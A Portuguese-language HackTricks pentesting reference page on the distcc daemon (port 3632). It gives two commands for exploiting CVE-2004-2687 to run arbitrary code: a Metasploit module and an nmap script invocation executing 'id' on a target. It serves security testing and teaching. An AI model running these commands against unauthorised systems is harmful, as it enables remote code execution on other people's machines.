3632 - Pentesting distcc

Aprenda e pratique Hacking AWS:HackTricks Training AWS Red Team Expert (ARTE) Aprenda e pratique Hacking GCP: HackTricks Training GCP Red Team Expert (GRTE)

Support HackTricks

Confira os planos de assinatura!
Junte-se ao 💬 grupo do Discord ou ao grupo do telegram ou siga-nos no Twitter 🐦 @hacktricks_live.
Compartilhe truques de hacking enviando PRs para os repositórios do HackTricks e HackTricks Cloud.

Informações Básicas

Distcc é uma ferramenta que melhora o processo de compilação utilizando o poder de processamento ocioso de outros computadores na rede. Quando distcc é configurado em uma máquina, essa máquina é capaz de distribuir suas tarefas de compilação para outro sistema. Este sistema receptor deve estar executando o daemon distccd e deve ter um compilador compatível instalado para processar o código enviado.

Porta padrão: 3632

PORT     STATE SERVICE
3632/tcp open  distccd

Exploração

Verifique se é vulnerável a CVE-2004-2687 para executar código arbitrário:

msf5 > use exploit/unix/misc/distcc_exec
nmap -p 3632 <ip> --script distcc-cve2004-2687 --script-args="distcc-exec.cmd='id'"

Shodan

Eu não acho que o shodan detecta este serviço.

Resources

Post criado por Álex B (@r1p)

Aprenda e pratique Hacking AWS:HackTricks Training AWS Red Team Expert (ARTE) Aprenda e pratique Hacking GCP: HackTricks Training GCP Red Team Expert (GRTE)

Support HackTricks

Confira os planos de assinatura!
Junte-se ao 💬 grupo do Discord ou ao grupo do telegram ou siga-nos no Twitter 🐦 @hacktricks_live.
Compartilhe truques de hacking enviando PRs para os repositórios do HackTricks e HackTricks Cloud.

Previous3389 - Pentesting RDP Next3690 - Pentesting Subversion (svn server)

Last updated 1 month ago